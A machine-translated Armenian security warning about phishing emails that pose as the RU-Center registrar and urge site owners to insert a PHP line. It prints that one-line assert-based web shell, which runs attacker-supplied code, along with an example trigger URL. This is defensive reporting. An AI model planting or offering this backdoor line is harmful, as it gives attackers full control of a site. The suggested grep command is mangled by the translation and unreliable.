Ուշադրություն PHP- ին չիմացող «վեբ վարպետներին»: Խոցելիություն:
Սա ավտոմատ թարգմանությունը է:
Սեղմեք այստեղ, անգլերեն լեզվով հրատարակությունը կարդալու համար:
Այսօր իմ ընկերներից ոմանք նամակներ ստացան, իբր RU -Center- ից (ամենամեծ ռուսերեն տիրույթի անվան գրանցիչը) `nic.ru- ից , հետևյալ բովանդակությամբ.
Նամակները ուղարկվել են [email protected] ից : Նամակում հարձակվողները, ովքեր իրենց ներկայացնում են RU-Center- ի անունից, առաջարկում են կայքում տեղադրել հետևյալ ծածկագիրը.
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>Unfortunatelyավոք, մեր գործընկերներից շատերը, ովքեր իրենց անվանում են «վեբ վարպետներ» (բազմաթիվ կայքերի սեփականատերեր), չգիտեն PHP և չեն մտածում վերը նշված կոդի վտանգների մասին: Եթե այս գործառույթին որպես պարամետր փոխանցեք տող, ապա այն պնդմամբ () կդիտարկվի որպես PHP կոդ: Ուշադիր եղիր!
Ես խորհուրդ եմ տալիս, որ դուք ստուգեք ձեր php նախագծերը խոցելիության համար `օգտագործելով պնդման կամ գնահատման հրամանները: Եթե այս հրամանները առկա են նախագծի ծածկագրում, ապա խուճապի մի մատնվեք `ուսումնասիրեք դրանց ալգորիթմը: Ալգորիթմների լիազորված օգտագործումը միանգամայն հնարավոր է: Վերոնշյալ օրինակի դեպքում հրամանը թույլ կտա հարձակվողներին զանգահարել ձեր կայք, օրինակ ՝ օգտագործելով RUCENTER պարամետրը ` http://sistema-audit.ru/?RUCENTER=PHP-code
Մենք խորհուրդ ենք տալիս որոնում կատարել, օրինակ ՝ linux հրամանով grep —i —r 'պնդել' / home / www / mysite / * ՝ նշելով կայքի ֆայլերով թղթապանակը, որպեսզի ստանաք այն ֆայլերի ցանկը, որոնցում կասկածելի օրինակն օգտագործվում է ծածկագիր:
Հոգ տանել ձեր և ձեր կայքերի մասին:
Սա ավտոմատ թարգմանությունը է:
Սեղմեք այստեղ, անգլերեն լեզվով հրատարակությունը կարդալու համար:
